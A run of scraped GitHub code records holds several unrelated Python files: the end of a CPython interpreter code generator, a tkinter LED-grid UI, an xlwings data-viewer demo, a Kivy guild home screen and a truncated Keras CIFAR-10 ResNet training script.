INLINE_CACHE_ENTRIES_LOAD_GLOBAL: Any \n INLINE_CACHE_ENTRIES_UNPACK_SEQUENCE: Any \n JUMP_BACKWARD: Any \n LOAD_ATTR: Any \n LOAD_CONST: Any \n LOAD_GLOBAL: Any \n METH_FASTCALL: Any \n METH_KEYWORDS: Any \n METH_NOARGS: Any \n METH_O: Any \n POP_JUMP_IF_FALSE: Any \n POP_JUMP_IF_TRUE: Any \n POP_TOP: Any \n PYGEN_ERROR: Any \n PYGEN_NEXT: Any \n PYGEN_RETURN: Any \n STORE_ATTR: Any \n STORE_FAST: Any \n STORE_FAST__LOAD_FAST: Any \n STORE_SUBSCR: Any \n UNPACK_SEQUENCE: Any \n \n ADAPTIVE_COUNTER_IS_ZERO: Callable \n BUILTINS: Callable \n CHECK_EVAL_BREAKER: Callable \n DECREMENT_ADAPTIVE_COUNTER: Callable \n DEOPT_IF: Callable \n DISPATCH: Callable \n DISPATCH_GOTO: Callable \n DISPATCH_INLINED: Callable \n DISPATCH_SAME_OPARG: Callable \n DK_ENTRIES: Callable \n DK_IS_UNICODE: Callable \n DK_UNICODE_ENTRIES: Callable \n DTRACE_FUNCTION_EXIT: Callable \n EMPTY: Callable \n GETITEM: Callable \n GETLOCAL: Callable \n GLOBALS: Callable \n GO_TO_INSTRUCTION: Callable \n INSTR_OFFSET: Callable \n JUMPBY: Callable \n KWNAMES_LEN: Callable \n LOCALS: Callable \n NEXTOPARG: Callable \n POP: Callable \n PREDICT: Callable \n PREDICTED: Callable \n PRE_DISPATCH_GOTO: Callable \n PUSH: Callable \n SECOND: Callable \n SETLOCAL: Callable \n STACK_GROW: Callable \n STACK_LEVEL: Callable \n STACK_SHRINK: Callable \n TOP: Callable \n TRACE_FUNCTION_EXIT: Callable \n \n PyCFunction: Any \n PyCodeObject: Any \n PyDictKeyEntry: Any \n PyDictObject: Any \n PyDictOrValues: Any \n PyDictUnicodeEntry: Any \n PyDictValues: Any \n PyDict_EVENT_MODIFIED: Any \n PyExc_AssertionError: Any \n PyExc_AttributeError: Any \n PyExc_KeyError: Any \n PyExc_NameError: Any \n PyExc_RuntimeError: Any \n PyExc_StopAsyncIteration: Any \n PyExc_StopIteration: Any \n PyExc_SystemError: Any \n PyExc_TypeError: Any \n PyFunctionObject: Any \n PyFunction_Type: Any \n PyGenObject: Any \n PyGen_Type: Any \n PyHeapTypeObject: Any \n PyInterpreterState: Any \n PyListIter_Type: Any \n PyListObject: Any \n PyMethodDef: Any \n PyMethodDescrObject: Any \n PyMethodDescrObject: Any \n PyMethodDescr_Type: Any \n PyMethodDescr_Type: Any \n PyMethod_Type: Any \n PyObject: Any \n PyRangeIter_Type: Any \n PySendResult: Any \n PyThreadState: Any \n PyTupleIter_Type: Any \n PyTupleObject: Any \n PyTuple_Type: Any \n PyTypeObject: Any = type\n PyType_Type: Any \n PyUnicode_Type: Any \n Py_EQ: Any \n Py_GE: Any \n Py_NE: Any \n 
Py_SIZE: Any \n Py_TPFLAGS_HEAPTYPE: Any \n Py_TPFLAGS_MANAGED_DICT: Any \n Py_TPFLAGS_MAPPING: Any \n Py_TPFLAGS_METHOD_DESCRIPTOR: Any \n Py_TPFLAGS_SEQUENCE: Any \n Py_ssize_t: Any \n _PyAttrCache: Any \n _PyBinaryOpCache: Any \n _PyBinarySubscrCache: Any \n _PyCFrame: Any \n _PyCFunctionFast: Any \n _PyCFunctionFastWithKeywords: Any \n _PyCallCache: Any \n _PyCompareOpCache: Any \n _PyErr_StackItem: Any \n _PyForIterCache: Any \n _PyFunction_Vectorcall: Any \n _PyInterpreterFrame: Any \n _PyListIterObject: Any \n _PyLoadGlobalCache: Any \n _PyLoadMethodCache: Any \n _PyOpcode_Deopt: Any \n _PyRangeIterObject: Any \n _PyStoreSubscrCache: Any \n _PyTupleIterObject: Any \n _PyUnpackSequenceCache: Any \n _Py_CODEUNIT: Any \n _Py_atomic_int: Any \n binaryfunc: Any \n next_instr: Any \n unaryfunc: Any \n \n PyAsyncGen_CheckExact: Callable \n PyCFunction_CheckExact: Callable \n PyCFunction_GET_FLAGS: Callable \n PyCFunction_GET_FUNCTION: Callable \n PyCFunction_GET_SELF: Callable \n PyCell_GET: Callable \n PyCell_New: Callable \n PyCell_SET: Callable \n PyCoro_CheckExact: Callable \n PyDict_CheckExact: Callable \n PyDict_DelItem: Callable \n PyDict_GetItemWithError: Callable \n PyDict_SetItem: Callable \n PyDict_Update: Callable \n PyErr_GivenExceptionMatches: Callable \n PyErr_SetExcInfo: Callable \n PyExceptionInstance_Check: Callable \n PyExceptionInstance_Class: Callable \n PyException_GetTraceback: Callable \n PyException_SetCause: Callable \n PyException_SetContext: Callable \n PyFloat_CheckExact: Callable \n PyFunction_Check: Callable \n PyFunction_GET_CODE: Callable \n PyFunction_GET_GLOBALS: Callable \n PyFunction_New: Callable \n PyGen_CheckExact: Callable \n PyIter_Check: Callable \n PyIter_Send: Callable \n PyList_AsTuple: Callable \n PyList_Check: Callable \n PyList_CheckExact: Callable \n PyLong_Check: Callable \n PyLong_CheckExact: Callable \n PyModule_CheckExact: Callable \n PyNumber_Negative: Callable \n PyNumber_Positive: Callable \n PyObject_CallMethodOneArg: Callable \n PyObject_CallOneArg: Callable \n PyObject_DelItem: Callable \n PyObject_IsTrue: Callable \n PyObject_RichCompare: Callable \n PyObject_SetAttr: Callable \n PyObject_SetItem: Callable \n PyObject_Str: Callable \n PyObject_Vectorcall: Callable \n PySequence_Check: Callable \n PySequence_Contains: Callable \n PySequence_Tuple: Callable \n PyTuple_CheckExact: Callable \n PyType_Check: Callable \n PyUnicode_CheckExact: Callable \n Py_CLEAR: Callable \n Py_IS_TYPE: Callable \n Py_Is: Callable \n Py_IsFalse: Callable \n Py_IsNone: Callable \n Py_IsTrue: Callable \n Py_NewRef: Callable \n Py_REFCNT: Callable \n Py_SETREF: Callable \n Py_UNREACHABLE: Callable \n Py_XSETREF: Callable \n _PyAsyncGenValueWrapperNew: Callable \n _PyBuildSlice_ConsumeRefs: Callable \n _PyCFunction_TrampolineCall: Callable \n _PyCode_CODE: Callable \n _PyCoro_GetAwaitableIter: Callable \n _PyCoro_GetAwaitableIter: Callable \n _PyDictOrValues_GetDict: Callable \n _PyDictOrValues_GetValues: Callable \n _PyDictOrValues_IsValues: Callable \n _PyDictValues_AddToInsertionOrder: Callable \n _PyDict_FromItems: Callable \n _PyDict_GetItemWithError: Callable \n _PyDict_LoadGlobal: Callable \n _PyDict_MergeEx: Callable \n _PyDict_NotifyEvent: Callable \n _PyDict_SetItem_Take2: Callable \n _PyErr_Clear: Callable \n _PyErr_ExceptionMatches: Callable \n _PyErr_Format: Callable \n _PyErr_FormatFromCause: Callable \n _PyErr_Occurred: Callable \n _PyErr_Restore: Callable \n _PyErr_SetKeyError: Callable \n _PyErr_SetString: Callable \n 
_PyEvalFrameClearAndPop: Callable \n _PyEvalFramePushAndInit: Callable \n _PyExc_PrepReraiseStar: Callable \n _PyFrame_Copy: Callable \n _PyFrame_FastToLocalsWithError: Callable \n _PyFrame_GetGenerator: Callable \n _PyFrame_IsIncomplete: Callable \n _PyFrame_LocalsToFast: Callable \n _PyFrame_PushUnchecked: Callable \n _PyFrame_SetStackPointer: Callable \n _PyFrame_StackPush: Callable \n _PyGen_FetchStopIterationValue: Callable \n _PyGen_yf: Callable \n _PyInterpreterState_GET: Callable \n _PyList_AppendTakeRef: Callable \n _PyList_FromArraySteal: Callable \n _PyList_ITEMS: Callable \n _PyLong_AssignValue: Callable \n _PyLong_GetZero: Callable \n _PyLong_IsPositiveSingleDigit: Callable \n _PyObject_CallNoArgs: Callable \n _PyObject_DictOrValuesPointer: Callable \n _PyObject_GC_IS_TRACKED: Callable \n _PyObject_GC_MAY_BE_TRACKED: Callable \n _PyObject_GC_TRACK: Callable \n _PyObject_GetMethod: Callable \n _PyObject_LookupSpecial: Callable \n _PySet_Update: Callable \n _PySys_GetAttr: Callable \n _PyThreadState_HasStackSpace: Callable \n _PyThreadState_PopFrame: Callable \n _PyTuple_FromArraySteal: Callable \n _PyTuple_ITEMS: Callable \n _PyType_HasFeature: Callable \n _PyType_HasFeature: Callable \n _PyUnicode_FromASCII: Callable \n _PyUnicode_JoinArray: Callable \n _Py_DECREF_NO_DEALLOC: Callable \n _Py_EnterRecursiveCallTstate: Callable \n _Py_LeaveRecursiveCallPy: Callable \n _Py_LeaveRecursiveCallTstate: Callable \n _Py_MakeCoro: Callable \n _Py_OPARG: Callable \n _Py_OPCODE: Callable \n _Py_STR: Callable \n _Py_Specialize_BinaryOp: Callable \n _Py_Specialize_BinarySubscr: Callable \n _Py_Specialize_Call: Callable \n _Py_Specialize_CompareOp: Callable \n _Py_Specialize_ForIter: Callable \n _Py_Specialize_LoadAttr: Callable \n _Py_Specialize_LoadGlobal: Callable \n _Py_Specialize_StoreAttr: Callable \n _Py_Specialize_StoreSubscr: Callable \n _Py_Specialize_UnpackSequence: Callable \n _Py_atomic_load_relaxed_int32: Callable \n \n call_exc_trace: Callable \n check_args_iterable: Callable \n check_except_star_type_valid: Callable \n check_except_type_valid: Callable \n deref: Callable \n do_call_core: Callable \n do_raise: Callable \n exception_group_match: Callable \n format_awaitable_error: Callable \n format_exc_check_arg: Callable \n format_exc_unbound: Callable \n format_kwargs_error: Callable \n import_all_from: Callable \n import_from: Callable \n import_name: Callable \n is_method: Callable \n match_class: Callable \n match_keys: Callable \n post_decr: Callable \n post_incr: Callable \n read_obj: Callable \n read_u16: Callable \n read_u32: Callable \n ref: Callable \n static_assert: Callable \n trace_call_function: Callable \n unpack_iterable: Callable \n \n \"\"\"\n )\n )\n # ^(?:[\\t ]*(?:\\r?\\n|\\r))+ after wards\n mod = generator.visit(tree)\n print(generator.field_names)\n mod = FixupMatchsVisitor().visit(mod)\n mod = FixupCallAssignVisitor().visit(mod)\n mod = FixupConstantsVisitor().visit(mod)\n mod = FixupNullVisitor(\n field_names=generator.field_names + [\"entry_frame\"]\n ).visit(mod)\n o.write(ast.unparse(mod))\n\n\nif __name__ == \"__main__\":\n arg_parser = argparse.ArgumentParser(\n description=\"Generate the code for the interpreter switch.\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n )\n arg_parser.add_argument(\n \"-i\", \"--input\", type=str, help=\"Instruction definitions\", default=DEFAULT_INPUT\n )\n arg_parser.add_argument(\n \"-o\", \"--output\", type=str, help=\"Generated code\", default=DEFAULT_OUTPUT\n )\n args = 
arg_parser.parse_args()\n translate_to_py(args.input, args.output)\n","repo_name":"makslevental/pypy","sub_path":"interpreter_generator/translate_to_py.py","file_name":"translate_to_py.py","file_ext":"py","file_size_in_byte":14032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"37524447394","text":"import tkinter as tk\nimport time\n\nimport led_logic\n\n# class Application(tk.Frame):\n# def __init__(self, master=None):\n# tk.Frame.__init__(self, master)\n# self.grid()\n# x_size=24\n# y_size=5\n# self.createWidgets(x_size,y_size)#odysee2016 beschaltung\n# self.grid1=led_logic.Grid(x_size,y_size)\n# self.rainbow=led_logic.Rainbow(self.grid1)\n# self.rainbow.horizontal_wave_initial()\n\nclass UI():\n def __init__(self):\n pass\n\n def createWidgets(self,x_size,y_size):\n self.button_grid=[]\n for x in range(x_size):\n self.button_grid.append([])\n for y in range(y_size):\n but=self.add_button(x,y)\n self.button_grid[x].append([])\n self.button_grid[x][y]=but\n #print(self.button_grid[x][y])\n \n self.test1 = tk.Button(self, text=\"Test1\", fg=\"red\",command=self.do_test1)\n self.test1.grid(row=0, column=x_size+1)\n self.test2 = tk.Button(self, text=\"Test2\", fg=\"red\",command=self.do_test2)\n self.test2.grid(row=1, column=x_size+1)\n \n self.QUIT = tk.Button(self, text=\"QUIT\", fg=\"red\",command=root.destroy)\n self.QUIT.grid(row=9, column=x_size+1)\n \n def update_button_colors(self,grid):\n tab=grid\n for x in range(len(tab)):\n for y in range(len(tab[0])):\n rgb=tab[x][y].get_color()\n hex_string=self._rgb_to_hex(rgb)\n #print(\"rgb:\",rgb,\"hex\",hex_string)\n self.button_grid[x][y][\"bg\"]=hex_string#'#000000'\n \n def _rgb_to_hex(self,rgb):\n hex_r=self._hex_string(int(rgb[0]*255))\n hex_g=self._hex_string(int(rgb[1]*255))\n hex_b=self._hex_string(int(rgb[2]*255))\n hex_str=\"#\"+hex_r+hex_g+hex_b\n #print(\"rgb\",rgb,\"hex_str\",hex_str)\n return hex_str\n \n def _hex_string(self,integer):\n h=str(hex(integer)).replace(\"0x\",\"\")\n if len(h)==1:\n h=\"0\"+h\n return h\n \n def add_button(self,x,y,color='#00F000'):\n hi_there = tk.Button(self,bg=color)\n #self.hi_there[\"text\"] = \"x\"\n hi_there[\"command\"] = self.say_hi\n hi_there.grid(row=y, column=x)\n return hi_there\n \n def say_hi(self):\n print(\"hi there, everyone!\")\n \n def do_test1(self):\n new_grid=self.rainbow.tick()\n self.update_button_colors(new_grid)\n root.after(50, self.do_test1)\n \n def do_test2(self):\n print(\"bar\")\n self.button_grid[5][2][\"bg\"]='#000000'\n\n","repo_name":"odenwilusenz/LRK","sub_path":"Programmieren/workspace/wireless_led_bar/common_gui_components.py","file_name":"common_gui_components.py","file_ext":"py","file_size_in_byte":2603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"32884813400","text":"\nimport xlwings as xw\nimport numpy as np\n#import pandas as pd\n\ndata1 = np.random.randint(1, 100, 10000)\nprint(data1.shape)\nxw.view(data1)\n\n\ndata2 = data1.reshape(100, 100)\nprint(data2.shape)\nxw.view(data2)","repo_name":"pepitogrilho/learning_python","sub_path":"xUdemy_xlwings/S2_FirstSteps/S2_10_xlwings_as_DataViewer_01.py","file_name":"S2_10_xlwings_as_DataViewer_01.py","file_ext":"py","file_size_in_byte":205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"24656017320","text":"#DO NOT LINK THIS PAGE, I PUT IN HERE BY ACCIDENT\n\nfrom kivy.properties import StringProperty\nfrom 
kivy.uix.gridlayout import GridLayout\nfrom kivy.uix.scrollview import ScrollView\nfrom kivy.uix.textinput import TextInput\n\n\nclass HomeScreen(Screen):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n\n layout = GridLayout(cols=2, row_force_default=True, row_default_height=60, spacing=10, padding=30)\n # Use a Label for the description\n\n search_input = TextInput(\n hint_text='Search for a guild...',\n size_hint = (None, None),\n size = (950, 50),\n pos_hint={'center_x': 0.4, 'center_y': 0.975}\n )\n\n\n submit = Button(\n text=\"Search\",\n size_hint=(None, None),\n size=(200, 50),\n pos_hint={'center_x': 0.7, 'y': 0.95},\n on_press=self.submit\n )\n class GuildBannerMenu():\n createGuild = Button(\n text=\"+ Guild\",\n size_hint=(None, None),\n size=(300, 100),\n pos_hint={'center_x': 0.1, 'y': 0.8},\n on_press=self.submit\n )\n \n myGuilds = Button(\n text=\"My Guild\",\n size_hint=(None, None),\n size=(300, 100),\n pos_hint={'center_x': 0.1, 'y': 0.7},\n on_press=self.submit\n )\n people = Button(\n text=\"My People\",\n size_hint=(None, None),\n size=(300, 100),\n pos_hint={'center_x': 0.1, 'y': 0.6},\n on_press=self.submit\n )\n \n class GuildScrolling():\n\n guilds = GridLayout(cols=1, spacing=10, size_hint_y=None)\n\n for i in range(100):\n btn = Button(text=str(i), size_hint_y=None, height=40)\n guilds.add_widget(btn)\n\n ScrollingGuilds = ScrollView(\n size_hint=(1, None),\n size=(500, 500),\n\n do_scroll_x = False)\n\n ScrollingGuilds.add_widget(guilds)\n\n\n \n\n\n #image stuff seems not to work anymore?\n #guildHolder = Image(source =\"GALAXYBRAINS.png\")\n\n\n\n #self.add_widget(guildHolder)\n\n # guildScroll = ScrollView(\n # do_scroll_y: True\n\n # )\n\n self.add_widget(search_input)\n self.add_widget(submit)\n self.add_widget(GuildBannerMenu.createGuild)\n self.add_widget(GuildBannerMenu.myGuilds)\n self.add_widget(GuildBannerMenu.people)\n self.add_widget(GuildScrolling.ScrollingGuilds)\n\n # # Use a Label for the description\n # more_text_label = Label(\n # text='Explain how your day is going:',\n # font_size=24,\n # pos_hint={'center_x': 0.5, 'center_y': 0.7}\n # )\n\n # Use a TextInput for entering the description\n # self.more_text_input = TextInput(\n # hint_text='Type here',\n # size_hint=(None, None),\n # size=(600, 200),\n # pos_hint={'center_x': 0.5, 'center_y': 0.5}\n # )\n\n next_button = Button(\n text=\"Next\",\n size_hint=(None, None),\n size=(100, 50),\n pos_hint={'center_x': 0.90, 'y': 0.05},\n on_press=self.on_next_button_click\n )\n back_button = Button(\n text=\"Back\",\n size_hint=(None, None),\n size=(100, 50),\n pos_hint={'center_x': 0.10, 'y': 0.05},\n on_press=self.on_back_button_click\n )\n\n\n class ScrollableLabel(ScrollView):\n text = StringProperty('')\n\n\n\n self.add_widget(back_button)\n self.add_widget(next_button)\n # self.add_widget(more_text_label)\n # self.add_widget(self.more_text_input)\n self.add_widget(layout)\n def on_back_button_click(self, instance):\n self.manager.current = \"image2\"\n def on_next_button_click(self, instance):\n self.manager.current = \"exit_window\"\n\n def submit(self, instance):\n search = self.search_input.text\n # Here, you can process the submitted weight and height as needed\n # For example, you can print them to the console\n print(f\"Stuff from search bar: {search}\")\n\n\nif __name__ == '__main__':\n 
SignUpApp().run()\n\n","repo_name":"skyeeey/Better-GUIlds","sub_path":"Res/HomeScreen.py","file_name":"HomeScreen.py","file_ext":"py","file_size_in_byte":4295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"32558629534","text":"rs = 10001\nimport datetime\nnow = datetime.datetime.now()\nprint(now)\n\nimport pandas as pd\nimport matplotlib\n\nfrom numpy.random import randn\nimport numpy as np\n\nimport matplotlib.pyplot as plt\n\nfrom IPython.display import SVG\nfrom keras.utils.vis_utils import model_to_dot\n\nimport os\nprint(os.listdir(\"../kaggle_cifar10\"))\n\n\nimport os.path\nimport itertools\nfrom itertools import chain\n\nimport numpy as np\nimport pandas as pd\nfrom sklearn import datasets\nfrom sklearn import preprocessing\nfrom sklearn.decomposition import PCA\nfrom sklearn import cluster, datasets, mixture\nfrom sklearn.datasets import load_digits\nfrom sklearn.preprocessing import StandardScaler, OneHotEncoder\nfrom sklearn.metrics import f1_score, classification_report, confusion_matrix\nfrom sklearn.model_selection import train_test_split\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import ListedColormap\nimport seaborn as sns\n\nimport tensorflow as tf\n\nfrom keras.layers import Input, Embedding, LSTM, GRU, Dense, Dropout, Lambda, \\\n Conv1D, Conv2D, Conv3D, \\\n Conv2DTranspose, \\\n AveragePooling1D, AveragePooling2D, \\\n MaxPooling1D, MaxPooling2D, MaxPooling3D, \\\n GlobalAveragePooling1D, GlobalAveragePooling2D, \\\n GlobalMaxPooling1D, GlobalMaxPooling2D, GlobalMaxPooling3D, \\\n LocallyConnected1D, LocallyConnected2D, \\\n concatenate, Flatten, Average, Activation, \\\n RepeatVector, Permute, Reshape, Dot, \\\n multiply, dot, add, \\\n PReLU, \\\n Bidirectional, TimeDistributed, \\\n SpatialDropout1D, \\\n BatchNormalization\nfrom keras.models import Model, Sequential\nfrom keras import losses\nfrom keras.callbacks import BaseLogger, ProgbarLogger, Callback, History\nfrom keras.callbacks import ModelCheckpoint, LearningRateScheduler, ReduceLROnPlateau\nfrom keras.wrappers.scikit_learn import KerasClassifier\nfrom keras import regularizers\nfrom keras import initializers\nfrom keras.metrics import categorical_accuracy\nfrom keras.constraints import maxnorm, non_neg\nfrom keras.optimizers import RMSprop\nfrom keras.utils import to_categorical, plot_model\nfrom keras import backend as K\nfrom keras.preprocessing.image import ImageDataGenerator\nimport keras\n\nfrom PIL import Image\nfrom zipfile import ZipFile\nimport h5py\nimport cv2\nfrom tqdm import tqdm\n\n\nfrom keras_ex.gkernel import GaussianKernel, GaussianKernel2, GaussianKernel3\n\n#Load Data\nsrc_dir = '../kaggle_cifar10/cifar10-dataset'\ntrain_data = os.path.join(src_dir, 'train_test/train')\ntest_data = os.path.join(src_dir, 'train_test/test')\n\n\n#...........\ntrain_labels = pd.read_csv(os.path.join(src_dir, \"trainLabels.csv\"))\nprint(train_labels.shape)\ntrain_labels.head(10)\n\n\n#.........\nid_key = dict([ee for ee in enumerate(np.unique(train_labels.label.values))])\nid_key\n\n\nkey_id = dict([(ee[1], ee[0]) for ee in enumerate(np.unique(train_labels.label.values))])\nkey_id\n\ny_train0 = np.array([key_id[ee] for ee in train_labels.label.values])\ny_train0\n\ntest_labels = pd.read_csv(os.path.join(src_dir, \"sampleSubmission.csv\"))\nprint(test_labels.shape)\ntest_labels.head()\n\n#..........\nfrom zipfile import ZipFile\n\ntrainImg_list = []\nwith ZipFile(train_zip, 'r') as myzip:\n for ii in 
train_labels.id.values:\n with myzip.open('train/'+str(ii)+'.png') as tgt:\n img = Image.open(tgt)\n img_array = np.asarray(img)\n trainImg_list.append(img_array)\n\nx_train0 = np.stack(trainImg_list).astype('float32') / 255.0\nx_train0.shape\n\ntestImg_list = []\nwith ZipFile(test_zip, 'r') as myzip:\n for ii in test_labels.id.values:\n with myzip.open('test/'+str(ii)+'.png') as tgt:\n img = Image.open(tgt)\n img_array = np.asarray(img)\n testImg_list.append(img_array)\n\nx_test = np.stack(testImg_list).astype('float32') / 255.0\nx_test.shape\nplt.imshow(x_train0[0])\nplt.imshow(x_test[0])\ny_cat_train0 = to_categorical(y_train0)\nprint(y_cat_train0.shape)\n\n#.........\nnrows=10\nncols=10\nfig, subs = plt.subplots(nrows=nrows, ncols=ncols, figsize=(15, 10))\n\nfor ii in range(nrows):\n for jj in range(ncols):\n iplt = subs[ii, jj]\n img_array = x_train0[ii*ncols + jj]\n iplt.imshow(img_array)\n\n#........\nnrows=10\nncols=12\nfig, subs = plt.subplots(nrows=nrows, ncols=ncols, figsize=(15, 10))\n\nfor ii in range(nrows):\n idx = (y_train0 == ii)\n target_img = x_train0[idx][:ncols]\n for jj in range(ncols):\n iplt = subs[ii, jj]\n img_array = target_img[jj]\n iplt.imshow(img_array)\nx_train = x_train0\ny_train = y_train0\ny_cat_train = y_cat_train0\n#Create model\ndef make_trainable_false(model, trainable=False):\n layers = model.layers\n for ilayer in layers:\n ilayer.trainable = trainable\n return\n\nclass TrainableCtrl(object):\n \n def __init__(self, model_dic):\n self.model_dic = model_dic\n self.trainable_dic = {}\n self.get_trainable()\n \n def get_trainable(self):\n for k in self.model_dic:\n model = self.model_dic[k]\n res = []\n for ilayer in model.layers:\n res.append(ilayer.trainable)\n self.trainable_dic[k] = res\n \n def set_trainable_false(self, model_key):\n model = self.model_dic[model_key]\n make_trainable_false(model)\n \n def set_trainable_true(self, model_key):\n model = self.model_dic[model_key]\n for ii, ilayer in enumerate(model.layers):\n ilayer.trainable = self.trainable_dic[model_key][ii]\n\nimg_shape = x_train.shape[1:]\nimg_dim = np.array(img_shape).prod()\nprint(img_dim)\n\nnn = 256*2 # output dim of img_cnvt\n\nnum_cnvt_lm = 2\nnum_cls = 10\n\nn = 3\ndepth = n * 9 + 2\n\ndef resnet_layer(inputs,\n num_filters=16,\n kernel_size=3,\n strides=1,\n activation='relu',\n batch_normalization=True,\n conv_first=True):\n \"\"\"2D Convolution-Batch Normalization-Activation stack builder\n # Arguments\n inputs (tensor): input tensor from input image or previous layer\n num_filters (int): Conv2D number of filters\n kernel_size (int): Conv2D square kernel dimensions\n strides (int): Conv2D square stride dimensions\n activation (string): activation name\n batch_normalization (bool): whether to include batch normalization\n conv_first (bool): conv-bn-activation (True) or\n bn-activation-conv (False)\n # Returns\n x (tensor): tensor as input to the next layer\n \"\"\"\n conv = Conv2D(num_filters,\n kernel_size=kernel_size,\n strides=strides,\n padding='same',\n kernel_initializer='he_normal',\n kernel_regularizer=regularizers.l2(1e-4))\n\n x = inputs\n if conv_first:\n x = conv(x)\n if batch_normalization:\n x = BatchNormalization()(x)\n if activation is not None:\n x = Activation(activation)(x)\n else:\n if batch_normalization:\n x = BatchNormalization()(x)\n if activation is not None:\n x = Activation(activation)(x)\n x = conv(x)\n return x\n\ndef _resnet_v2(input_shape, depth, num_classes=10):\n \"\"\"ResNet Version 2 Model builder [b]\n Stacks of (1 x 1)-(3 x 3)-(1 x 1) 
BN-ReLU-Conv2D or also known as\n bottleneck layer\n First shortcut connection per layer is 1 x 1 Conv2D.\n Second and onwards shortcut connection is identity.\n At the beginning of each stage, the feature map size is halved (downsampled)\n by a convolutional layer with strides=2, while the number of filter maps is\n doubled. Within each stage, the layers have the same number filters and the\n same filter map sizes.\n Features maps sizes:\n conv1 : 32x32, 16\n stage 0: 32x32, 64\n stage 1: 16x16, 128\n stage 2: 8x8, 256\n # Arguments\n input_shape (tensor): shape of input image tensor\n depth (int): number of core convolutional layers\n num_classes (int): number of classes (CIFAR10 has 10)\n # Returns\n model (Model): Keras model instance\n \"\"\"\n if (depth - 2) % 9 != 0:\n raise ValueError('depth should be 9n+2 (eg 56 or 110 in [b])')\n # Start model definition.\n num_filters_in = 16\n num_res_blocks = int((depth - 2) / 9)\n\n inputs = Input(shape=input_shape)\n # v2 performs Conv2D with BN-ReLU on input before splitting into 2 paths\n x = resnet_layer(inputs=inputs,\n num_filters=num_filters_in,\n conv_first=True)\n\n # Instantiate the stack of residual units\n for stage in range(3):\n for res_block in range(num_res_blocks):\n activation = 'relu'\n batch_normalization = True\n strides = 1\n if stage == 0:\n num_filters_out = num_filters_in * 4\n if res_block == 0: # first layer and first stage\n activation = None\n batch_normalization = False\n else:\n num_filters_out = num_filters_in * 2\n if res_block == 0: # first layer but not first stage\n strides = 2 # downsample\n\n # bottleneck residual unit\n y = resnet_layer(inputs=x,\n num_filters=num_filters_in,\n kernel_size=1,\n strides=strides,\n activation=activation,\n batch_normalization=batch_normalization,\n conv_first=False)\n y = resnet_layer(inputs=y,\n num_filters=num_filters_in,\n conv_first=False)\n y = resnet_layer(inputs=y,\n num_filters=num_filters_out,\n kernel_size=1,\n conv_first=False)\n if res_block == 0:\n # linear projection residual shortcut connection to match\n # changed dims\n x = resnet_layer(inputs=x,\n num_filters=num_filters_out,\n kernel_size=1,\n strides=strides,\n activation=None,\n batch_normalization=False)\n x = add([x, y])\n\n num_filters_in = num_filters_out\n\n # Add classifier on top.\n x1 = GlobalMaxPooling2D()(x)\n x2 = GlobalAveragePooling2D()(x)\n x = concatenate([x1, x2])\n # v2 has BN-ReLU before Pooling\n# x = BatchNormalization()(x)\n x = Activation('sigmoid')(x)\n# x = AveragePooling2D(pool_size=8)(x)\n \n # Instantiate model.\n model = Model(inputs=inputs, outputs=x, name='model_img_converter')\n return model\n\n#............. 
image_converter\nmodel_img_cnvt = _resnet_v2(input_shape=img_shape, depth=depth)\nmodel_img_cnvt.summary()\n\n#gkernel2\ndef make_model_gkernel(nn=nn, num_lm=num_cnvt_lm, random_state=0, scale=1):\n inp = Input(shape=(nn,), name='inp')\n oup = inp\n \n np.random.seed(random_state)\n #init_wgt = (np.random.random_sample((num_lm, nn))-0.5) * scale\n init_wgt = np.random.random_sample((num_lm, nn))\n \n weights2 = [init_wgt, np.log(np.array([1/(2*nn*0.1*scale)]))]\n oup = GaussianKernel3(num_landmark=num_lm, num_feature=nn, weights=weights2, name='gkernel')(oup)\n# weights2 = [np.log(np.array([1/(2*nn*0.1*scale)]))]\n# oup = GaussianKernel2(init_wgt, weights=weights2, name='gkernel')(oup)\n model = Model(inp, oup, name='model_gkernel')\n return init_wgt, model\n\nlm_gkernel, model_gkernel = make_model_gkernel(random_state=rs)\nmodel_gkernel.summary()\n\nprint(lm_gkernel.shape)\n\ndf = pd.DataFrame(lm_gkernel[:,:5])\ndf.head()\nfig = sns.pairplot(df, markers=['o'], height=2.2, diag_kind='hist')\n\n#output layer\ndef get_circle(nn=10, rs=None):\n np.random.seed(rs)\n idx = np.pi*2*np.arange(nn)/nn\n idx += 2*np.pi*np.random.random(1)\n idx = np.random.permutation(idx)\n #return idx\n init_wgt = np.c_[np.cos(idx), np.sin(idx)]\n return init_wgt\n\ninit_circle = get_circle(nn=num_cls, rs=rs)\ninit_circle = init_circle*0.8/2 + 0.5\nprint(init_circle)\n\ndf = pd.DataFrame(init_circle)\ndf['cls'] = ['c'+str(ee) for ee in range(num_cls)]\ndf.head()\nfig = sns.pairplot(df, markers='o', size=2.2, diag_kind='hist', hue='cls')\naxes = fig.axes\naxes[0,0].set_xlim(0, 1)\naxes[0,0].set_ylim(0, 1)\naxes[1,1].set_xlim(0, 1)\naxes[1,1].set_ylim(0, 1)\n\ndef make_models_out(init_heart, nn=num_cnvt_lm, num_cls=num_cls):\n inp = Input(shape=(nn,), name='inp')\n # oup = Dense(num_cls, activation='sigmoid')(inp)\n# init_wgt = np.random.random_sample((num_cls, nn))\n# weights = [init_wgt, np.log(np.array([1/(2*nn*0.1)]))]\n# oup = GaussianKernel3(num_landmark=num_cls, num_feature=nn, weights=weights, name='gkernel3')(inp)\n weights = [np.log(np.array([1/(2*nn*0.1)]))]\n oup = GaussianKernel2(init_heart, weights=weights, name='gkernel_out')(inp)\n model = Model(inp, oup, name='model_out')\n return model\n\nmodel_out = make_models_out(init_circle)\nmodel_out.summary()\n\n\ndef make_modelz(img_shape, model_img_cnvt, model_gkernel2, model_out):\n inp = Input(shape=img_shape, name='inp')\n oup = model_img_cnvt(inp)\n oup = model_gkernel2(oup)\n oup1 = model_out(oup)\n pre_model = Model(inp, oup1)\n pre_model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\n return {\n 'pre_model': pre_model,\n 'model_img_cnvt': model_img_cnvt,\n 'model_gkernel2': model_gkernel2,\n 'model_out': model_out,\n 